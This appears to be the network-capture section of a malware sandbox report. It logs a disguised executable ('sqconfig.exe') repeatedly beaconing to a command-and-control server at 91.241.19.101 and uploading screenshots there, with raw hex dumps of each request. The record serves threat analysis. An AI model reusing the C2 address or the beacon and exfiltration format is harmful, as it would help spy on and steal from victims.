                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:30.443291903 CEST16608OUTData Raw: 18 9e 1f 3a 0f ed 1d 3d f5 28 22 32 cb a7 23 b9 9d 00 19 61 9d 9e 59 65 19 25 43 92 30 46 32 08 ac 40 72 b9 15 d8 58 7f 63 cb e2 bb bd 7e cb 5d b4 13 4a 67 ba b6 b0 b9 dd 04 a6 57 07 f7 6f 23 81 0a 80 58 fc db ce 40 e0 64 e0 73 b0 da 68 ea 63 8e
                                                                  Data Ascii: :=("2#aYe%C0F2@rXc~]JgWo#X@dshcMyWWah8>q8g%k)n\S`JS{E%(bQIA (`:6`QKHAKJZ`- 1EAE-RRQEZNQ@Mh$Z(SE-%
                                                                  Sep 30, 2021 23:53:30.443407059 CEST16629OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:30.443455935 CEST16642OUTData Raw: 58 da 39 35 fb c7 47 05 59 59 81 04 1e a0 8c 55 3d 22 c3 45 d5 75 99 a4 91 af 6c b4 5b 78 3c eb 82 f2 24 92 c7 c8 50 03 05 01 b2 ec bf c2 38 27 8e 33 57 21 f0 9c 0b 7b 65 05 dc d2 a2 47 7f 73 6b a9 3a 95 f9 12 15 12 16 4c 8e 33 1e e2 33 9e 47 e1
                                                                  Data Ascii: X95GYYU="Eul[x<$P8'3W!{eGsk:L33GG54(ns1[:g;I$p59!mxs]0AZ#QI](r?&WMLQE0KEHL;QEZ(S@vBRGjCE4Q@SLL(BZAKLAJ)){hbJ
                                                                  Sep 30, 2021 23:53:30.642983913 CEST16652INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  119192.168.2.34994891.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:30.518198013 CEST16650OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:30.707230091 CEST16652INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:30 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  12192.168.2.34977191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:52:53.132951021 CEST7415OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----a925bc230fdbeec72a266ea97d6eb24e
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86299
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:52:53.133070946 CEST7415OUTData Raw: 2d 2d 2d 2d 2d 2d 61 39 32 35 62 63 32 33 30 66 64 62 65 65 63 37 32 61 32 36 36 65 61 39 37 64 36 65 62 32 34 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------a925bc230fdbeec72a266ea97d6eb24eContent-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:52:53.133235931 CEST7425OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:52:53.133362055 CEST7427OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:52:53.253395081 CEST7431OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:52:53.253663063 CEST7434OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:52:53.253710985 CEST7444OUTData Raw: 8e f4 94 53 01 73 4a 0d 36 96 84 c4 3c 35 3d 5b 9a 84 53 85 55 c9 68 9b 20 d0 54 1a 88 1a 50 4d 55 c5 61 c6 15 34 c3 6f e9 52 06 a7 06 a2 c9 8a f2 45 63 0b 0a 69 42 3b 55 de 0d 2e c5 34 b9 10 fd a3 ea 67 91 4a 2a e9 85 4d 30 db 77 14 bd 9b 2b da
                                                                  Data Ascii: SsJ6<5=[SUh TPMUa4oREciB;U.4gJ*M0w+")jC;Rh|b(/4`1K)KE.(N)%q1F)qF)XW1Or2(I1E[hRR1B1Z>bRbF\!!1ZiZ\R!&*R)1SbBVK+)
                                                                  Sep 30, 2021 23:52:53.253940105 CEST7448OUTData Raw: 17 c7 1a a2 6b d7 6a 8a 00 55 52 00 00 76 1c 52 ff 00 c2 c6 f1 8f fd 0c 17 bf f7 d0 ff 00 0a e4 85 1a b0 77 8c ac fd 59 d5 3a b4 a6 ad 25 74 7d 29 a6 f8 5b 44 d2 26 f3 ac b4 e8 a3 94 74 76 25 d8 7d 0b 12 47 e1 56 b5 af f9 00 ea 3f f5 eb 2f fe 80
                                                                  Data Ascii: kjURvRwY:%t})[D&tv%}GV?/kX1Sdchefz1DwUh#4Q]((|$u^]+0%g8kxGZkBIoeiR &3_jZey8nTl\O\
                                                                  Sep 30, 2021 23:52:53.253973007 CEST7453OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:52:53.375427008 CEST7459OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:52:53.375478983 CEST7467OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:52:53.546113968 CEST7502INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:52:53 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  120192.168.2.34995091.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:31.152630091 CEST16656OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:31.320884943 CEST16670INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  121192.168.2.34995191.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:31.315181017 CEST16657OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:31.315491915 CEST16658OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:31.315851927 CEST16668OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:31.316181898 CEST16670OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:31.447263956 CEST16674OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:31.447324991 CEST16682OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:31.447386980 CEST16689OUTData Raw: 59 c1 05 8e 14 12 7b 9c 9c 0a c5 46 aa 76 4f bf e6 d9 ab 95 26 9b 7f d6 df f0 4a 32 f9 0b 73 32 41 2f 9d 0a c8 cb 1c bb 4a ef 50 78 6c 1e 46 47 38 a6 e1 69 8f 2c 93 48 f2 cb 23 49 2b b1 67 77 39 66 27 92 49 ee 68 cd 76 47 64 99 c9 2b 36 da 1d e5
                                                                  Data Ascii: Y{FvO&J2s2A/JPxlFG8i,H#I+gw9f'IhvGd+6HbhNy>y&qh3jBTg;YKjOjp{QJ*;O%OCG#+Rg.VXRvwC(m4;RJQIJ(h()iQK@E.(4XBQK1@RB
                                                                  Sep 30, 2021 23:53:31.447715998 CEST16691OUTData Raw: b3 f0 e4 ab ad 45 65 a8 95 58 e5 b7 b9 95 64 b5 b9 8a 60 5a 28 9d f1 b9 0b 2e 41 51 91 d7 07 b6 45 16 be 2d 7b 0b 3b 31 6f 61 2c d7 96 d7 89 75 14 b7 b7 0b 2a 43 b5 cb 94 89 44 61 a3 56 38 c8 de 41 e4 e3 3c 89 af 3c 5c 97 17 32 de a4 1a dc d7 a2
                                                                  Data Ascii: EeXd`Z(.AQE-{;1oa,u*CDaV8A<<\2:*TIR]-?TnS@/$FhUm@1AL92U9nxG],\CsFI."BwDy:u_Ob(!>\|Am=v57Umwuuk
                                                                  Sep 30, 2021 23:53:31.447803020 CEST16696OUTData Raw: a4 9b a9 73 51 66 97 34 5c 56 25 06 96 a1 dd 4e 0d 40 ac 4a 0d 2e 6a 2c d2 83 4c 9b 12 0a b7 ad 1c 78 29 39 ff 00 97 8a a4 0d 59 d5 f9 f0 5e 7f e9 e2 b8 f1 4b 45 ea 75 e1 17 be 78 f5 01 49 65 51 8c 92 00 cd 3b 14 d6 5d ca 47 ad 78 07 d6 1b 5a fc
                                                                  Data Ascii: sQf4\V%N@J.j,Lx)9Y^KEuxIeQ;]GxZny[#6$E8f`\N;|VUR;YO,GC`jV.:K@mq3Ylqf{<U5[Ea5F$P>oKW%~?z.u7M!iJrl
                                                                  Sep 30, 2021 23:53:31.581953049 CEST16716OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:31.582568884 CEST16722OUTData Raw: 45 14 50 03 85 29 a6 8e b4 e3 d2 a8 42 51 45 14 84 14 a2 92 96 98 01 a7 0e 94 dc d2 d3 10 ea 29 0d 14 08 5a 51 d6 90 53 a9 83 0a 51 4d cd 28 34 c4 28 a7 52 0a 5e f4 c4 03 ad 06 8a 29 88 05 38 53 7b d2 d3 01 d4 a2 9a 29 73 8a 64 8b 4d 27 9a 09 a4
                                                                  Data Ascii: EP)BQE)ZQSQM(4(R^)8S{)sdM'1j@Ttbh)ZQb)p5Dv-;(<1Rka1iE%(DNBQE!8JMEe;IIhc4iNv"y-?HalHRB-IDP*%
                                                                  Sep 30, 2021 23:53:31.813008070 CEST16748INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Content-Length: 0
                                                                  Connection: keep-alive
                                                                  Sep 30, 2021 23:53:31.865879059 CEST16748OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:32.051913023 CEST16748INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  122192.168.2.34995391.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:31.554687977 CEST16697OUTPOST /g7vcSfkbDs2/index.php HTTP/1.1
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 82
                                                                  Cache-Control: no-cache
                                                                  Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                  Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
                                                                  Sep 30, 2021 23:53:31.753443956 CEST16747INHTTP/1.1 200 OK
                                                                  Server: nginx/1.20.1
                                                                  Date: Thu, 30 Sep 2021 21:53:31 GMT
                                                                  Content-Type: text/html; charset=UTF-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: keep-alive
                                                                  Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                  Data Ascii: 6<c><d>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  123192.168.2.34995591.241.19.10180C:\Users\user\AppData\Roaming\SQLite Distributed tools\sqconfig.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  Sep 30, 2021 23:53:32.162262917 CEST16750OUTPOST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1
                                                                  Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912
                                                                  Host: 91.241.19.101
                                                                  Content-Length: 86294
                                                                  Cache-Control: no-cache
                                                                  Sep 30, 2021 23:53:32.162416935 CEST16750OUTData Raw: 2d 2d 2d 2d 2d 2d 30 32 66 36 30 30 62 64 36 30 38 65 64 31 33 65 35 35 31 62 62 36 38 39 63 31 34 66 62 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61
                                                                  Data Ascii: ------02f600bd608ed13e551bb689c14fb912Content-Disposition: form-data; name="data"; filename="152138533219.jpg"Content-Type: application/octet-stream
                                                                  Sep 30, 2021 23:53:32.162692070 CEST16761OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 60 00 60 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d
                                                                  Data Ascii: JFIF``C $.' ",#(7),01444'9=82<.342C2!!22222222222222222222222222222222222222222222222222"}!1A
                                                                  Sep 30, 2021 23:53:32.162776947 CEST16763OUTData Raw: 10 9e 74 85 f6 e7 ae 32 78 ae f7 e1 91 b7 b5 2b a8 5d 78 a2 2b 18 62 b8 70 da 6c b3 84 59 b3 18 01 c8 2e 07 53 fd d3 f7 3f 2c 96 e2 a4 d3 ad 75 b1 6b 46 b7 b3 5d 73 4f 2b f0 df 51 b4 61 73 19 17 0f 71 70 44 27 70 f9 c8 2b 82 07 5e 78 e2 bc ff 00
                                                                  Data Ascii: t2x+]x+bplY.S?,ukF]sO+QasqpD'p+^xX*:>;MFo+q2q -um}gx[n"pq=xH_.X4Ti6W.b*^`QK%QHNbSW|:c6Eye'\<$4_KK
                                                                  Sep 30, 2021 23:53:32.291884899 CEST16767OUTData Raw: 1b 8a 31 4e a3 14 ec 2b 8d c7 b5 18 a7 62 8a 02 e3 71 46 29 f4 98 a2 c1 71 98 a4 c5 48 45 26 3d a9 58 77 19 8a 50 29 f8 a3 14 58 2e 37 14 84 53 f1 46 29 d8 2e 33 14 62 9f 8a 4a 56 0b 8d c5 26 29 f8 a3 14 58 2e 33 14 60 53 b1 46 28 b0 5c 6d 25 29
                                                                  Data Ascii: 1N+bqF)qHE&=XwP)X.7SF).3bJV&)X.3`SF(\m%)b%bf(:E\mKIV*B)R7Z(/4AqbC@&)QN"c{F(a@ )qKn(4ZJTbh#EI'Sk^/JQ[-NH
                                                                  Sep 30, 2021 23:53:32.292004108 CEST16790OUTData Raw: 06 81 71 a3 e8 d6 96 b1 69 90 5a ba da 79 9a 8b de 5a 19 60 97 20 4a 5e 02 82 66 f9 b7 02 19 d9 30 41 e0 0e 24 d4 24 d2 24 bf 8d ec a2 d0 61 d5 8e 95 27 95 1c f7 16 72 db 89 c4 ff 00 c6 51 52 df 7f 95 9c 65 71 d3 39 20 1a f3 8f 29 7d 28 f2 97 fb
                                                                  Data Ascii: qiZyZ` J^f0A$$$a'rQReq9 )}()U=KGcQXbeG!`630AGwgi.$X<eFZU &s<w_Pt*.:-g{H1$m|(Y~c`9:kiZjxKa
                                                                  Sep 30, 2021 23:53:32.422497988 CEST16796OUTData Raw: 56 04 c9 43 1f 5a 78 73 eb 50 83 4e 06 a5 a3 45 26 4c ae 73 52 09 0d 40 29 d9 a8 69 1a 29 b2 c0 94 8e f5 22 dc c8 a7 87 35 54 1a 70 35 0e 08 d5 54 91 a0 9a 84 cb fc 66 ac 26 a9 28 ea 41 fa 8a c9 06 9e 0d 67 2a 51 7d 0d a3 5e 6b a9 b0 ba 9e 7e fc
                                                                  Data Ascii: VCZxsPNE&LsR@)i)"5Tp5Tf&(Ag*Q}^k~jil?*Nk'At5Xu56^M:^ [mgJzA o-D$nhU9(=S}z(5i)&uujuUBsES|;mSNi'~T}fKtTG0W
                                                                  Sep 30, 2021 23:53:32.422557116 CEST16798OUTData Raw: ef fb 90 fd 57 e6 79 ab 7c 06 d3 36 9d ba 80 2d 8e 01 85 c0 ff 00 d1 95 e5 1e 34 f0 4d ff 00 84 b5 16 8e 54 26 03 ca ba e4 8c 7a 83 dc 7f 93 5f 57 59 5d 25 f5 85 bd dc 60 84 9e 25 95 41 ea 03 00 7f ad 67 78 97 c3 f6 be 23 d2 25 b3 b8 45 2f 82 62
                                                                  Data Ascii: Wy|6-4MT&z_WY]%`%Agx#%E/br>c2=6nx*Kb$S[Gg\CjA ~H!QN*K*5eJ[h:g4U>6Z]3NVts0h,;qqY}h}i
                                                                  Sep 30, 2021 23:53:32.422760963 CEST16811OUTData Raw: ad 1e ca 7d 85 ed a1 dc a1 4e e2 af 0d 38 fa d2 8d 38 fa d5 7b 19 76 13 ad 0e e5 0a 2a ff 00 f6 71 f5 a5 fe ce 3e a2 8f 65 2e c1 ed a3 dc a1 4e ab c3 4e 3e b4 e1 a7 1f 5a af 63 2e c4 fb 68 77 33 e9 2b 48 69 a7 d6 97 fb 30 fa d1 ec 66 2f 6f 0e e6
                                                                  Data Ascii: }N88{v*q>e.NN>Zc.hw3+Hi0f/on)kQ4GZOUK>>E<VH_U{)3E_WSdZMav'44e/:zT/b)*V_YG^Ujjs8x@
                                                                  Sep 30, 2021 23:53:32.422817945 CEST16832OUTData Raw: a6 05 37 42 27 95 99 42 4f 13 26 8b 38 a4 35 45 af f1 d0 54 2d 7e e7 a5 76 f2 33 91 50 93 35 3e 5f 5a 43 24 63 a9 ac 66 ba 90 f7 a8 cc ae 7b d3 e4 34 58 77 d4 db 37 51 2f 61 51 b6 a2 ab d3 15 8d 92 7b d1 c9 a3 91 1a 2a 09 1a 6d aa 31 e9 50 3e a1
